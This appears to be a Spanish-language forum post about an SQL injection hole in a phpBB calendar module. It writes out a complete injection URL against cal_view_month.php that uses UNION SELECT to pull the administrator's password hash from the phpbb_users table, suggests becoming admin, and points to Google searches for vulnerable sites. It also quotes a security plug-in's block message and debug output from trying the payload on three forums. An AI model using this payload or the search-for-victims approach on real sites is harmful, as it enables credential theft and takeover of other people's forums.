hay que tonteria compilar un exploit para eso...
http://www.servidor.com/phpBB/cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=2/*y si mejor te haces admin? jeje por lo que entiendo es inyeccion SQL, no solo lo que dice ahi..
y parece ser que tambien funciona en downloads.php
y ahora no pusiste los resultados "Google" para sitios vulnerables... son:
Resultados 1 - 10 de aproximadamente 1.160 de ???.(0,48 segundos)
phpBB Security© Thinks You Should Go Away.
You have been blocked because you have tried to a clike type script to this site & that is a potential malicious attempt to gain un-authorized access.
If you feel you have reached this message in an error due to the site, please contact the admin at forum@snailsource.com.
esto no se porque salio, si es la misma version que el de abajo.
Attempt to abuse old category exploit
DEBUG MODE
Var: -1 UNION SELECT user_password FROM phpbb_users where user_id=2/*
Line : 124
File : cal_main.inc
probado en 3 foros diferentes, en uno sirvio el bug en los otros 2 no.
por cierto 2 son mios,y uno de una amiga...